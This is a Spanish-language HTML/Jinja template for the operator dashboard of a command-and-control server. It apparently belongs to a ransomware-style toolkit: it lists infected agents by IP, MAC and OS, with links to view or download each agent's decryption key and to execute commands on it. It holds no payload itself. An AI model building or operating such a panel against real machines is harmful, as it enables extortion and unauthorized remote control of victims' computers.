<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="{{ url_for('static', filename='styles.css') }}">
    <title>Servidor C2</title>
</head>

<body>
    <div class="container-fluid mt-5">
        <h1>Servidor de Comando y Control</h1>
        <table class="table table-bordered">
            <thead>
                <tr>
                    <th>ID</th>
                    <th>IP</th>
                    <th>MAC</th>
                    <th>S.O</th>
                    <th>Clave de descifrado</th>
                    <th>Gestionar agente</th>
                </tr>
            </thead>
            <tbody>
                {% for agent in agents %}
                <tr>
                    <td>{{ agent.id }}</td>
                    <td>{{ agent.ip }}</td>
                    <td>{{ agent.mac }}</td>
                    <td>{{ agent.so }}</td>
                    <td>
                        <a href="{{ url_for('view_private_key', agent_id=agent.id) }}" class="btn btn-green">Ver clave</a>
                        <a href="{{ url_for('download_private_key', agent_id=agent.id) }}" class="btn btn-green">Descargar clave</a>
                    </td>
                    <td>
                        <a href="{{ url_for('execute_command', agent_id=agent.id) }}" class="btn btn-green">Ejecutar comandos</a>
                    </td>
                </tr>
                {% endfor %}
            </tbody>
        </table>
    </div>
</body>

</html>

